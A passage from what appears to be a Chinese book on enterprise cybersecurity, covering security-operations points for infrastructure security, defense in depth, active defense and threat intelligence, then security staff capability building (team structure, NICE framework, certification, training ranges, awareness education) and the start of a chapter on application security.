“基础架构安全”领域的“技术工作”建设要点,需要关注各类框架在设计完毕后,能够落地执行并持续更新。这包括在设计“安全域划分”框架后,通过安全运行相关工作来梳理IP地址规划,依据安全域严格划分子网,使用白名单策略来控制跨安全域间的通信,并通过建立网络ACL的管理制度与申请流程来持续维护“安全域划分”框架的有效性;还包括在明确设备资产、信息化系统、业务应用、身份凭证和密钥的“生命周期管理”框架后,通过安全运行相关工作,完成生命周期中的安全初始化工作、变更安全测试工作、纳管与许可维护工作、运行状况监控工作、临时特权与例外维护工作,以及最终吊销回收工作,以持续维护“生命周期管理”框架的有效性。为了避免框架的有效性被持续挑战,需要通过相关安全管理制度来明确组织上的责任范围与责任归属,通过安全管理办法来明确场景下的行为准则与支撑流程,最终通过安全运行流程与规程的落地,使“基础架构安全”中的技术工作得到有效执行。 3.“基础架构安全”领域的“保障方案”要点 “基础架构安全”领域的“保障方案”建设要点,需要关注的是通过网络边界设备的策略梳理以及网络边界流量的采集分析来持续保障安全域的有效隔离,通过系统监控与网络扫描持续监管资产纳管与许可管理的执行,通过互联网探测服务进行攻击者视角的资产盘点,通过可控的模拟攻击来检测员工安全管理制度的学习质量与安全意识。通过以上方面安全运行保障方案的探索与实践,持续确保安全运行在“基础架构安全”领域是实战化的。 15.3.3 “纵深防御”领域建设要点 在“纵深防御”领域,主要工作包括安全运行的“流程规程”与“安全规范”的落地。“流程规程”工作围绕工程项目中的安全系统与安全平台的建设,将常态化运行事务的流程与规程落地,制定安全更新方案、策略维护方案、故障排除方案,以及数据统计方案。“安全规范”工作包括制定安全保障团队建设方案,以及人员技术能力规范,还包括制定策略配置规范、评价指标规范、安全决策规范。确保通过安全运行活动将静态的安全产品构筑成为存在纵深防御的动态安全防护体系。 1.“纵深防御”领域的“协同管理”要点 “纵深防御”领域中的“协同管理”建设要点,需要关注安全运行团队建设方案,以及人员技术能力规范的需求澄清,并得到决策者的支持。需要根据当前纵深防御部署情况,澄清安全运行团队中的人员规模需求、能力需求,以及相应的获取与培养方案。需要随着生产业务、安全业务的发展,提升安全运行成熟度的需求,更新团队建设方案,以及人员技术能力规范。 2.“纵深防御”领域的“技术工作”要点 “纵深防御”领域中的“技术工作”建设要点,需要关注安全纵深中各领域的策略配置规范(包括默认安全配置方案),以及不同业务环境、不同业务级别下的策略配置建议。这包括但不限于访问控制策略、异常行为策略、特权策略、网络访问控制策略、上网行为策略、终端安全策略、入侵安全防护策略、安全组策略、Web应用安全策略、数据泄露检测策略等。除此之外,需要制定以上纵深领域的常态化安全运行方案,包括:计划性完善部署,以识别盲区与推动安全部署;计划性更新,以推动更新测试与更新推广;计划性策略维护,以维护临时策略、例外策略、特权策略;计划性故障排查,以检查功能与性能异常;计划性数据统计,以统计安全运行成果。为了能够通过评价安全运行保障水平来促成安全决策,我们还需要关注用于制定各安全领域的指标监控与安全决策的规范,包括数据指标设计与参数配置,以及数据指标范围所对应的安全决策。最终通过安全运行流程与规程的落地,使“纵深防御”中的技术工作得到有效执行。 3.“纵深防御”领域的“保障方案”要点 “纵深防御”领域中的“保障方案”建设要点,需要关注以项目的方式推动安全运行流程与规程的迭代。以威胁分析能力识别安全运行保障所存在的缺陷,以跨领域的威胁缓解措施进行安全事件应急响应。通过以上方面的安全运行保障方案的探索与实践,持续确保安全运行在“纵深防御”领域是实战化的。 15.3.4 “积极防御”领域建设要点 在“积极防御”领域,主要工作包括安全运行的“威胁应对”与“风险应对”相关的工作。“威胁应对”工作包括制定常态化的安全监控事务来提升威胁响应速度。制定突发性安全事务预案,以对威胁类型与严重等级执行既定的解决措施与缓解措施。落地跨组织的威胁响应协同流程,使威胁核实、溯源分析、响应处置过程更加全面彻底。制定关联分析与产品联动方案,实现跨防御纵深的威胁线索有明确定义且做到有效共享。“风险应对”工作包括与安全配置符合性相关的评估加固方案维护、计划维护,以及系统与员工行为基线的采集与建立、监控与维护。确保通过安全运行达成更高效、更敏感的威胁控制与风险控制。 1.“积极防御”领域的“协同管理”要点 “积极防御”领域中的“协同管理”建设要点,需要制定突发安全事件的应急响应预案,这包括明确突发安全事件的类型、事件等级与SLA(服务等级协议)。明确组织在事件中的职责与工作流程、可以提供的技术支持,以及期望得到的技术支持。最终通过既定运行方案实现突发事件的协同处置。除此之外,还需要制定跨安全纵深的通用威胁检测响应技术工作流程,统一威胁核实、追溯来源、评估影响、灰度处置、持续遏制5个阶段的定义。在管理上,实现跨安全产品在威胁响应阶段上的概念统一和技术思路的统一。最后,还需要制定跨安全纵深的威胁线索共享机制,通过威胁线索共享,触发相关团队的威胁响应技术工作流程。通过跨团队的关联分析、协同研判,更好地保证暴露威胁特征,实现更高质量的威胁响应效率,以及防护措施部署。 2.“积极防御”领域的“技术工作”要点 “积极防御”领域中的“技术工作”建设要点,在威胁应对方面,需要关注特定安全产品的常态化威胁检测响应工作清单,定义该产品有效威胁的监控能力,以及威胁线索获取来源。在执行方面,设计具体的操作流程与规程,来覆盖具体安全事件类型。除此之外,还需要关注跨安全产品的关联分析、协同研判工作方案,包括围绕网络五元组、身份凭证、文件样本方面的威胁线索共享,设计具体操作流程与规程,来覆盖具体联动的场景。在风险应对方面,需要关注维护安全风险评估标准、加固计划与加固实施方案,确保采用的风险评估方案采纳了最新漏洞情报、厂商指南,以及合规政策的建议。最后,还需要关注安全行为基线分析,包括采集安全行为数据、设计系统与员工行为基线、使用与维护基线,以发现早期安全风险。最终通过安全运行流程与规程的落地,使“积极防御”中的技术工作得到有效执行。 3.“积极防御”领域的“保障方案”要点 “积极防御”领域中的“保障方案”建设要点,需要关注关键信息系统在行为基线应用上的优势。关键信息系统对安全威胁的容忍度低,而威胁检测类安全产品不能满足安全保障需求。所以,需要为关键信息系统应用对安全风险更加敏感的解决方案。由于关键信息系统的业务变更周期长,行为稳定,因此可以以一段时间内的系统行为为基础建立行为基线。在威胁被检测到之前,相关威胁行为会隐藏在业务行为中,还会导致行为基线偏离,因此能够更早地介入,核实威胁,控制风险。具备行为采集能力的安全产品可以从各个业务关系的角度,为关键信息系统设计与应用带有基线监控功能的保障方案。 15.3.5 “威胁情报”领域建设要点 在“威胁情报”领域,主要工作包括安全运行的“威胁采集”与“风险采集”相关工作。在“威胁采集”工作中,包括本地情报的档案化管理、实现威胁新特征的持续监控与采集、安全策略的持续更新,以及围绕威胁档案开展威胁狩猎培训。除此之外,高阶情报运营相关的情报采集的规则与模型维护,配合机器学习、数据挖掘等技术领域的支撑,以及安全运行团队的支撑,可以实现威胁情报的生成工作。 1.“威胁情报”领域的“协同管理”要点 “威胁情报”领域中的“协同管理”建设要点,在威胁采集方面,需要关注本地化的威胁档案管理机制,包括通过统一的威胁情报平台维护本地已发生威胁的情报特征,并形成档案;通过各团队围绕威胁档案的持续监控,补充行为与IOC特征,以维护档案。最终围绕威胁档案所配置的安全策略,建立引用关系,完善策略配置,并应用档案。在风险采集方面,需要制定有计划的渗透测试活动,以及后续整改计划,包括针对生产业务设计渗透测试方案,收集可被攻破的风险情报,同时以项目的方式推动渗透测试与整改的执行,形成闭环。 2.“威胁情报”领域的“技术工作”要点 “威胁情报”领域中的“技术工作”建设要点,需要关注通过云端情报收录的已知威胁,以协助威胁检测,完善安全策略。这包括关注各领域的安全产品,通过它们的安全运行实现情报驱动威胁检测,以及关注跨领域的安全产品,基于它们的威胁检测结果,完善纵深防御的安全策略。除此之外,还需要通过情报运营能力,完善新型威胁的情报采集,包括通过机器学习、人工智能、数据挖掘等技术领域的支撑,完成情报素材数据的清洗、整合与初筛。通过监控规则、行为分析模型完成新型威胁的特征情报采集工作。最终通过安全运行流程与规程的落地,使“威胁情报”中的技术工作得到有效执行。 3.“威胁情报”领域的“保障方案”要点 “威胁情报”领域中的“保障方案”建设要点,需要关注围绕本地化威胁档案的威胁狩猎培训方案。在安全运行过程中,并不是所有的团队成员都能经历各类安全威胁的对抗过程,所以需要一个围绕威胁情报的模拟狩猎方案,对更多的安全运行团队成员进行技能培训。这包括将本地化的威胁档案,以及产品采集到的历史威胁行为数据作为培训资料。在威胁狩猎训练中,将威胁档案的局部内容作为初始条件,展开跨时间、跨安全纵深的威胁狩猎,逐步还原完整的威胁档案,以及完成威胁检测响应相关的技术工作过程,提升团队威胁狩猎技能,实现培训目的。通过培训能够完善跨团队的应急响应预案和各产品技术的工作流程,以及威胁线索共享的落地。 第16章 安全人员能力支撑 16.1 数字化转型与业务发展的新要求 16.1.1 人在网络安全中的重要性越来越高 2020年,安全界顶级盛会RSAC的主题是Human Element(人的因素),强调了人在网络安全中的重要性越来越高。2008年,美国发布的《国家网络安全综合计划(CNCI)》中提到,“美国政府已花费数十亿美元用于网络空间安全技术,但是决定成败的是运用这些技术的人是否具备充足的知识、技能和能力。然而,当前联邦政府或私营领域均没有足够的网络安全专家来落实CNCI计划”。CNCI计划的第八项计划“扩大网络教育”,明确了美国国家网络安全人才培养的战略定位,成为美国国家网络安全人才政策发展中的重要里程碑。 网络攻防是一场人与人的对抗。隐藏在各种网络攻击行为后面的从来都是人——是拥有网络攻击能力、渗透能力的黑客,利用各种攻击工具、创新方法,对目标网络进行渗透和攻击。想仅仅依靠安全设备和产品实现对信息系统和数据资产的保护,这并不现实。只有将具备网络安全能力的人员或团队与先进的产品技术、完善的制度流程相互配合,才能达到最佳的防护效果。 16.1.2 为什么需要安全人员能力 众所周知,人员、技术、流程是一个组织能够高效完成一项任务的三个关键要素。不同的领域,任务复杂程度不同,人员、技术、流程三者所占的比重也不尽相同。在相对传统、成熟的领域,产品技术比较成熟,流程也比较规范,对人员的数量和能力要求会比较低。而在新兴领域,产品技术更新快速,流程制度不断完善,对人员或团队的要求就相对较高。在网络安全领域,由于其天然的对抗性和威胁来源的复杂性,因此对人员或团队的依赖和能力要求会更高。 随着网络安全进入内生安全时代,网络安全行业对人员的要求越来越高。内生安全归根结底还是要靠人的聚合,既要保证IT建设运维与安全防护的职责融合,又要实现IT技能与安全技能的融合。以某个大型实网攻防演习为例,需要汇聚组织方、攻击方和防守方三支队伍,才能完成对系统安全性和运行保障有效性的检验。防守方一般由系统运营单位、攻防专家、安全厂商、软件开发商、网络运维团队、云提供商等多方人员聚合组成。 另外,由于网络的联通性,网络攻击常常不受时间、地点限制,攻击瞄准的对象不仅包括各种信息系统,也包括企业中的人员,比如企业自身员工、外包服务团队、合作供应商人员等,甚至是这些人的家人、朋友。所有这些人员的安全意识水平也决定了企业安全水平的高低。 综上所述,企业与组织在建设自身安全体系时,应提前进行安全人才储备,将IT人才和安全人才聚合起来,全面提升安全人员能力,以此作为后续安全发展的根基。 16.2 什么是安全人员能力 16.2.1 基本概念 企业网络安全人员能力是指为保护企业的信息系统及其数据资产所需的企业所有人员的整体网络安全软能力的总称。 安全人员能力包含企业安全管理人员的安全规划和管理能力、安全运行团队人员的技术能力,还包含企业全员的安全意识。 16.2.2 设计思想 对于数字化程度越来越高的现代企业来说,如果不能持续保持稳定的安全人员能力,则后果非常严重。企业安全人员能力建设应从网络安全的组织能力和人员能力两个方面开展。 合理的安全组织机构设置和明确的安全岗位职责是保障企业安全人员能力可切实落地的重要措施。仅靠几位专家或几次培训,安全能力无法形成并稳定运行;仅靠IT部门负责人或“安全部门”负责人,也难以推动安全能力的有效落地。这都是因为缺少组织保障和岗位职责规范。 另一方面,随着业务的发展,技术在不断更新升级,外部环境也在不断变化。在这种背景下,可持续运行的实战化、场景化的实训机制(实训平台、实训靶场),是安全人员能力能够适应变化、不断成长的必要保障。 还需要提及的是,除安全人员组织能力和人员能力外,企业全员的网络安全意识也很重要。因为与企业信息系统相关的每个人都可能成为被攻击渗透的目标,这包括从事企业业务运行、企业管理的各类人员,以及服务外包人员、供应商人员等。企业的安全运行团队或安全管理团队一般缺乏足够的号召力去驱动企业的这些人员,所以企业的全员网络安全意识教育应该是“一把手”工程,应该由CIO或CSO负责,才能落地见效。由于涉及的人员都是各个部门的业务人员,实施过程需要场景化、实战化。 16.2.3 总体架构 安全人员能力的总体架构如图16.1所示。 1.网络安全团队设计 根据企业信息化系统的建设以及网络安全策略和规划来设计网络安全团队,包括组织结构、汇报关系、成员构成、岗位设置、职级划分、岗位职责、薪酬体系等内容。 2.网络安全岗位能力模型 基于网络安全岗位职责,结合安全运行工作要求,参考网络安全人才框架能力模型,制定企业自身的网络安全岗位能力模型,明确不同岗位类别对应的专业领域、工作角色、工作任务,以及所需的知识、技能和能力(KSA)。 3.网络安全实训课程 根据不同网络安全岗位的能力要求,开发网络安全实训课程体系。针对不同的岗位类别,结合实际的安全运行场景和网络攻防案例,进行安全管理、安全运行、安全开发、风险评估、渗透测试等安全课程培训,确保企业网络安全团队具备实战化的网络安全运行能力。 图16.1 安全人员能力的总体架构 4.网络安全实训系统平台 建设用于支撑实战场景课程体系的网络安全实训系统。 ● 建设用于网络安全学习和实践的网络安全实训/竞赛平台。该平台集知识培训、技能训练、仿真演练、科研测试、攻防对抗、管理考核于一体,可自定义网络拓扑和课程场景,可持续更新实训课程内容。 ● 建设用于网络安全实战和应急响应的网络安全实战训练靶场。该靶场可最大程度地仿真用户的真实业务场景,可根据真实攻防案例构建攻防实训场景,可根据网络安全团队的岗位和角色训练团队的整体实战能力。 5.行业网络安全从业人员认证体系 建立不同岗位的人才评价标准,设计符合行业网络安全岗位能力要求的网络安全能力认证体系。对于大型的企业和行业客户,可以建立自己的网络安全从业人员认证体系;对于中小企业,可以根据自身情况选择国家或企业的网络安全认证,如奇安信公司的网络安全工程师认证。从关键岗位开始,逐步实现网络安全人员的持证上岗。规划网络安全人员的职业成长路径,促进从业人员能力的持续提升。 6.网络安全运行和网络安全体系规划 通过上面几个环节,培养出具有实际工作能力的网络安全团队。在实际工作中,当安全体系伴随业务演进发生调整变化时,或安全运行体系对安全人员的岗位和能力提出新的要求时,需要更新岗位设计和能力要求,进一步更新网络安全实训课程的内容和实训平台的场景。这是企业安全人员能力建设闭环的重要一步,只有不断根据实际需要进行调整,才能建设出符合企业需求的安全人员能力。仅依靠外部的培训和学校中的学习是很难做到的,这也是企业要建设有自身特色的安全人员能力的原因。 16.2.4 关键要点 高效建设具有实战能力的网络安全团队涉及两个方面:一是能够根据企业、行业的业务需求和信息化建设要求,设计或选择合适的网络安全从业人员认证体系,同时根据认证体系的要求设计合理的实训课程体系,用于衡量人才水平,为人才培养指明方向;二是能够适应网络安全领域的对抗性特点,提升人员解决实际安全问题的能力(一般通过实训系统或网络靶场等技术平台开展网络安全实战训练)。 1.网络安全从业人员认证体系 对于网络安全从业人员的认证的选择,需要结合企业的实际需求。如CISP认证属于大而全的知识体系认证,覆盖面广(但不会太深),可使学员对信息安全有体系化的总体了解。如果需要渗透方面的能力,可以考虑CISP-PTE认证考试等。而对于大部分企业需要的安全运营、数据分析等方面的认证,则可以参考奇安信公司推出的网络安全工程师认证。图16.2所示为奇安信网络安全工程师认证体系。 对于有鲜明行业特色的大型行业,可以与网络安全专业服务厂商一起,设计符合行业特色的从业人员认证体系,以便更好地满足行业的网络安全能力建设需求。图16.3所示为某金融机构设计的认证体系。 有了合适的认证体系,就可以根据需求开发建设配套的课程体系。有针对性的课程体系是保障安全人员获得与岗位相适应的能力的重要环节。图16.4所示为某金融客户设计的实训课程体系。 2.网络安全实训平台/实战靶场 在确定认证与课程体系后,网络安全知识获取过程中最重要的实操验证就是通过网络安全实训平台(或教学实训靶场)来完成,用以配合学习理论知识,强化实操训练。 在知识、技能、能力(KSA)的体系中,实训平台(或教学实训靶场)是学习网络安全知识,并通过实操、实训把知识转化成技能的平台。而如何将技能转化为能力并积累经验,就需要有场景化的实战演练靶场系统来辅助。场景化的实战演练靶场的定位是在最接近真实的场景中体验真实的攻击,帮助企业安全团队提升安全事件的检测、分析、处置能力。具备完善的教师与学员的角色、丰富的攻防场景、强大的自动化攻击场景定制功能等,这些是选择这类靶场的关键考量因素。 在平台功能及技术方面,为了支撑在统一的硬件平台上满足不同的虚拟演练环境,需要实训平台能柔性、可视化地构建各种仿真业务场景及虚实结合(信息架构下无法虚拟的系统需要硬件接入)的网络环境,且所构建的网络环境与底层支撑硬件平台的拓扑结构无关。支撑平台采用虚拟化技术和SDN技术,实现网络虚拟化,并结合基于OpenFlow的虚实结合的技术,将实物设备接入到虚拟环境,从而柔性构建出虚实结合的网络环境。通过虚拟化的隔离技术、VLAN隔离技术以及访问控制技术,可并发支持多个相互隔离的网络环境,从而支持多个用户及多个实验同时进行实训。 16.2.5 预期成效 安全能力建设最终会使企业、机构具备与自身业务和信息化需求相匹配的安全人员能力,能够与企业投资的各种安全设备与安全流程配合,最大程度地保护企业的系统与数据安全。 该过程有两个方面重要的输出成果: ● 在企业内建立一套至少由CXO牵头负责的组织机构并设立明确的岗位职责; ● 建立一套可持续运行的实战化、场景化的安全人员培养机制(包括配套的实训课程体系、认证体系等),能够持续地为企业培养相关人才,保障人员安全能力持续稳定的输出。 16.3 安全人员能力建设的方法与要点 16.3.1 总体流程 企业网络安全人员能力建设的内容不仅包含网络安全运行团队人员技术能力的培养和建设,还包含为保障能力有效落地并在企业运行中持续保持,所需要的组织机构、岗位职责等方面的建设,同时还包含全员的安全意识教育。 在图16.5所示的安全人员能力提升流程图中,可以概括为以下3个方面: ● 网络安全组织机构建设; ● 网络安全人员能力建设; ● 全员网络安全意识教育。 需要说明的是,企业网络安全人员能力的建设,并不意味着所有的能力都要由企业来建设,有些可以依靠外部咨询服务来完成,有些可以通过外包服务达成相应的能力,还有一些则是企业自身必须具备的安全能力。 图16.5 安全人员能力提升流程图 16.3.2 网络安全组织机构建设 1.网络安全团队设计 作为一个在数字化时代能够保障业务安全有序运转的机构,网络安全团队应基于安全体系规划和安全运行体系,结合信息化体系和人力资源特点,进行系统化设计,使其涵盖组织结构、汇报关系、成员构成、岗位设置、职级划分、岗位职责及薪酬体系等方面。 综合国家相关标准的基本要求,结合企业安全管理实践,一个典型的企业中网络安全组织机构如图16.6所示。企业网络安全组织机构一般包含网络安全与信息化决策部门、网络安全归口管理部门、应急处理工作组和网络安全执行部门。 (1)网络安全与信息化决策部门 网络安全与信息化决策部门(如网络安全与信息化领导小组)是网络安全的最高决策机构,负责研究重大事件、落实方针政策和制定总体策略等。该部门的正职由公司负责人担任,副职由公司科技部门的领导担任,公司各部门负责人为小组成员。网络安全与信息化决策部门一般为机构内的虚拟组织,其主要职责如下: ● 根据国家和行业有关信息安全的政策、法律和法规,批准机构信息系统的安全策略和发展规划; ● 确定各有关部门在信息系统安全工作中的职责,领导安全工作的实施; ● 监督安全措施的执行,并对重要安全事件的处理进行决策; ● 指导和检查信息系统安全职能部门及应急处理小组的各项工作; ● 建设和完善信息系统安全的集中管控的组织体系和管理机制。 图16.6 企业网络安全组织机构示意图 (2)网络安全归口管理部门 决策部门下设网络安全归口管理部门(信息安全职能部门)作为日常工作执行机构。网络安全归口管理部门的关键岗位建议专人专岗,不建议兼职。该部门的主要职责如下: ● 根据国家和行业有关信息安全的政策法规,起草组织机构信息系统的安全策略和发展规划; ● 管理机构信息系统安全日常事务,检查和指导下级单位信息系统安全工作; ● 负责或组织安全措施的实施,组织并参加对安全重要事件的处理,监控信息系统安全总体状况,提出安全分析报告; ● 指导和检查各部门和下级单位信息系统安全人员及重要岗位人员的信息系统安全工作; ● 应与有关部门共同组成应急处理小组或协助有关部门建立应急处理小组,以实施相关应急处理工作; ● 管理信息系统安全机制中管理机构的各项工作,实现信息系统安全的集中控制管理; ● 完成信息系统安全领导小组交办的工作,并向领导小组报告机构的信息系统安全工作。 (3)应急处理工作组 应急处理工作组(可作为虚拟组织设立)的组长由信息技术部门负责人担任,成员由信息安全工作组负责人提名,报信息安全领导小组审批。应急处理工作组的主要职责如下: ● 制定、修订公司网络与信息系统的安全应急策略及应急预案; ● 决定相应应急预案的启动,负责现场指挥,并组织相关人员排除故障,恢复系统; ● 每年组织对信息安全应急策略和应急预案进行测试和演练; ● 落实、执行信息安全领导小组安排的有关应急处理的工作。 (4)网络安全执行部门 网络安全归口管理部门下设网络安全执行部门,负责对安全管理员、系统管理员、数据库管理员、网络管理员、重要业务开发人员、系统维护人员、重要业务应用操作人员等信息系统关键岗位人员进行统一管理。 2.网络安全岗位能力 在安全管理机构及岗位确定后,需要考虑如何培养相应岗位上的人员能力,明确不同岗位的岗位职责、工作流程、能力要求。 网络安全技术岗位的类别及领域划分可以参考NICE[3]网络空间安全人才框架进行设计,如图16.7所示。NICE网络空间安全人才框架将网络安全从业人员分为7个大类、33个专业领域和52个工作角色,并为每个角色设置了应执行的任务(Task),以及应具备的知识、技能和能力(KSA)。 NICE网络空间安全人才框架像是一部安全人才字典,是内容丰富全面的参考手册,但对于大部分企业来说过于庞大,需要根据企业的实际情况,与专业的安全服务厂商配合,梳理规划出适合企业实际情况的岗位设置。图16.8所示为某机构对岗位设置的具体描述。 图16.7 NICE网络空间安全人才框架(NCWF)中的类别及专业领域 图16.8 岗位设置示例 规划出岗位设置即可明确岗位描述,在这个基础上可以梳理出岗位的典型工作任务和工作流程,由此总结提炼出该岗位的通识能力和专业技术技能。后续可以基于这些来规划人员安全能力建设的相关实训课程体系和实训内容的规划,如表16.1所示。 表16.1 岗位职责、工作任务及所需技能梳理示例 组织结构及岗位职责规划一旦完成,则不应经常变化,除非业务流程及业务系统发生重大变化。因此网络安全组织结构及岗位职责规划可由企业牵头,借助专业的安全厂商来进行规划。同时,应根据企业的业务特点和人力资源规划,进行科学设计,确定哪些岗位可以通过专业的安全外包服务商来解决,哪些岗位是企业自身必须具备的。 16.3.3 网络安全人员能力建设 1.网络安全实训课程体系和能力认证体系 在确立组织结构和岗位职责后,最重要的落地工作就是根据岗位职责,结合网络安全人才框架能力模型,确定各个岗位的安全能力要求。然后按照安全能力要求,综合设计网络安全实训课程体系。另外,需要建立不同岗位的人才评价标准,设计符合行业网络安全岗位能力要求的网络安全能力认证体系。 2.网络安全实训/竞赛平台和实战训练靶场 建设用于网络安全学习和实践的网络安全实训/竞赛平台,以及用于网络安全实战和应急响应的网络安全实战训练靶场,提升人员的网络安全技能和安全团队的实战能力。这是人员安全能力提升的平台支撑。 图16.9所示为网络安全人才培养的4个主要环节。“理论学习”一般是在学校里进行的系统化的学习,在企业中往往是针对在实训中遇到的理论知识点进行学习。另外,由于网络安全本身的很多操作具有破坏性,或者改变网络防护策略可能会对业务有潜在影响,因此“实网演练”往往不会用于日常的人员实训,只在特定时间的演习中才能执行。由于网络安全本身的实战对抗性以及企业在职人员的团队特性,因此“实操实训”和“靶场演练”这两个环节尤为重要。 图16.9 网络安全人才培养的各主要环节 在图16.10所示的网络靶场全景图中,“网络安全教学实训靶场”“网络安全竞技靶场”和“场景化实战演练靶场”用于人员安全能力建设,“网络安全综合测试靶场”主要用于科研和测试,“实网演习靶场”主要用于实网攻防演习,一般以服务的方式提供。 图16.10 网络靶场全景图 “网络安全教学实训靶场”即我们常说的实训系统,内置了网络攻防、安全运营、云安全、代码安全、网络取证、逆向、安全管理等各个方向的课程、仿真实训环境以及考核评估功能,集成了十多款网络安全产品,可以进行各种网络安全知识的学习和实操训练,可以帮助安全工作人员掌握网络安全方面的各项技能。实训系统以单人学习训练为主,旨在把网络安全相关的知识(Knowledge)转化成技能(Skill)。 “网络安全竞技靶场”可以支持网络安全竞赛,包括常见的CTF(夺旗赛)和攻防混战等比赛形式。通过举办网络安全竞赛,以赛促学、以赛代练,能够很好地提升企业安全团队的学习积极性,检验学习效果。 与实训系统的知识学习、单人的技能练习,以及竞技系统中专门设计的简单模拟攻防不同,“场景化实战演练靶场”强调在真实的企业场景中,使用真实的安全运营设备,模拟真实的网络攻击,以安全运营团队为组织,进行综合的网络安全应急响应演练。场景化实战演练靶场强调的是场景化、实战化。企业可以根据自己的实际业务的网络情况构建网络靶场的拓扑,把在真实网络中发生的各种网络攻击在靶场环境中重现。受训团队也按照实际工作岗位的情况,分成多个角色,如SIEM管理员、FW管理员、Web服务管理员等,以团队模式进行演练。通过“场景化实战演练靶场”,安全工作人员可以把所学的知识(Knowledge)、技能(Skill)有效转化为实际的能力(Ability)。“场景化实战演练靶场”的一个重要特性是简单易用,能够快速灵活构建攻击场景,使用户将注意力放在团队训练上,而不是花费大量的时间和人力去建设资源、开发场景、设计流程。 企业可以根据自身需求,建设符合自身特色的课程资源和平台,并通过持续地积累和不断地调整优化,形成自己的安全人员能力建设系统。 16.3.4 全员网络安全意识教育 在企业安全人员能力建设中,全员网络安全意识教育也是重要的一环。企业安全意识能力建设的落地主要包含资源建设和制度建设两个部分。 资源建设针对个人的知识技能和行为反应,通过个人能力的提升来提升组织群体的能力,可分为通用资源和特色资源建设。资源建设在内容形式上包括网络安全文化宣传、网络安全意识在线教育、网络安全攻防场景互动体验、社会工程学威胁演示演练等形式。有效的安全意识测评系统与实战演练项目,能够帮助企业有效量化和评估人员的安全意识学习效果。 制度建设主要是通过组织行为来保证个人能力能够有效提升,从而保障组织的整体安全人员能力。制度建设主要通过在绩效管理中纳入安全意识考核结果,并在岗位职责中明确安全意识能力,有效保障在职级晋升过程中相应岗位的人员具备相应的安全意识能力。 第17章 应用安全能力支撑 17.1 数字化转型与业务发展的新要求 17.1.1 数字化转型对应用安全提出新要求 随着产业的不断发展,数字化转型已经逐渐成为各行业发展的必然趋势。企业不再局限于利用信息技术来提升效率和改善用户体验,而是开始利用信息化来改善业务决策、增强创新、促进企业转型,从而确保企业在竞争中获得领先地位。企业信息化也从业务支撑工具逐渐转变成业务运行的基础设施。应用系统基于信息化能力承接业务需求,是企业业务在信息化环境中的投射。应用系统也成为业务需求和信息化技术最主要的结合点,以及企业数字化转型的关键,这也给应用安全提出了更高的要求。 ● 快速交付带来的挑战 在数字化转型的背景下,应用开发、运维模式都开始向敏捷模式转变。在敏捷模式下,一个迭代往往在1~2周内完成,应用系统的开发、测试、部署是快速迭代并同时进行的,这对应用系统的安全保障提出了更高的要求。 ● 集成中间件的增加带来更多风险 在数字化转型的背景下,应用系统开发团队会更多地使用中间件来提升开发效率。由于集成中间件的增加,软件供应链对应用系统安全性的影响增大,这将给应用系统安全带来更多风险。 ● 自动化带来全新的要求 在数字化转型的背景下,应用系统的开发、测试、运维都需要广泛地使用工具和平台来提升自动化水平。在这些应用系统的生命周期内引入的自动化的工具和平台,对安全融入应用系统生命周期提出了全新的要求。 ● 应用系统的安全要求不断增强 在数字化转型的背景下,随着网络安全法、密码法、“等保2.0”的颁布,以及个人信息保护、数据安全相关标准和立法的不断推进,国家、行业对信息化的安全要求不断提升,对应用系统的安全要求也不断加强。与此同时,越来越多的应用系统随业务的发展不再局限于在组织内部使用,而更多地向合作伙伴、用户开放,这也将对应用系统提出了更高的安全要求。 17.1.2 网络安全形势与威胁 在数字化转型的背景下,企业在快速发展业务的同时,也会建立与客户、行业生态间的广泛连接,从而使得企业应用系统的业务价值不断提升。同时,这种变化也要求应用系统在快速适应业务变化的同时,能够与产业生态中的各类软件组件进行广泛交互和深入集成。正是这些业务层面的变化使得应用系统的开发从传统的瀑布模式转向了敏捷开发模式,并引入了包括移动应用、云计算、大数据、物联网、边缘计算、5G通信、人工智能等在内的一系列新技术,这极大地扩展了企业暴露给外界的攻击面(Attacking Surface),使得企业数字化环境的安全边界逐渐变得模糊,给数字化转型的安全带来严峻挑战。 17.1.3 传统能力的不足 传统的应用开发安全能力支撑在应用架构管控、安全需求、安全能力支撑、安全工具与开发流程的集成方面存在较多问题和不足。 ● 应用架构管控不足 在传统的应用开发中,架构管控组织中往往缺乏安全架构师,且安全团队参与的时间较晚。安全团队往往无法及时对应用提出架构层面的安全建议,也难以把安全因素融入到组织的应用架构管控流程中去,导致应用架构缺乏安全视角的有效输入,由此导致安全风险增大,安全能力长期难以提升。 ● 缺乏系统化安全需求导入 应用系统安全往往跨越多个层次,涉及各个领域。而传统的应用开发往往缺乏对安全需求系统的梳理和分析,导致缺乏系统化的安全需求导入。 ● 组件化安全能力支撑不足 由于缺乏安全基础设施的支持,在身份和认证、数据加密、业务安全、统一日志审计等方面都缺乏必要的支撑,导致各个业务系统的安全能力参差不齐,同时也导致这些方面的安全控制措施难以实施。 ● 缺乏与开发流程集成的安全工具 在传统的应用开发中,安全大都通过流程卡点的形式与开发流程集成,实际的安全检查、审核的工作是由安全人员人工执行的,且不便与开发流程中的工具和平台集成。这种缺乏自动化的模式将阻碍敏捷模式下的快速交付。 17.2 什么是应用安全能力支撑 17.2.1 基本概念 应用安全能力是结合应用开发流程,充分考虑敏捷、持续集成、开发运维一体化(DevOps)等应用开发新模式,实现安全防护机制内生于应用系统,保持应用开发敏捷的同时,确保应用建成后满足合规要求,能够对抗风险,实现安全防护机制内生于应用系统的组织能力。这种综合性的组织能力覆盖了应用全生命周期的各个环节,包括应用全生命周期的人员、工具、流程。 17.2.2 设计思想 ● 内生安全思想 内生安全是应用安全能力支撑的核心思想,需要将安全工具与应用系统开发、测试、运维的工具和平台进行对接与集成,使安全嵌入到开发乃至运维的每个阶段,实现安全工作的前置,将安全与应用系统的开发、测试、维护进行深度聚合。 ● 系统工程思想 应用系统是业务信息化的主要载体,需要运用系统工程的思想,通过业务、应用、数据、技术的多视角分析来充分识别安全需求;通过安全架构规范、安全部署规范、安全基础设施、安全能力组件形成应用安全能力支撑;通过自动化工具、平台的整合,实现与应用系统从开发到运行的全生命周期融合,实现对应用系统各个层面、各个领域、各个阶段的安全能力支撑。 17.2.3 总体架构 应用安全能力支撑需要围绕应用开发流程,在需求分析、架构设计、开发、测试、部署、运行的各个环节将安全内置于应用生命周期的各项活动中,实现安全内生于应用的全生命周期(见图17.1)。 图17.1 安全能力支撑总体架构 17.2.4 关键技术 ● 设计模板化 设计模板化是应用安全能力支撑的重要基础,需要综合业务、应用、数据、技术等多个视角的安全分析,形成安全需求清单、安全架构模板,增强架构管控能力,奠定应用安全持续提升的基础,系统化提升应用安全支撑能力。 ● 流程自动化 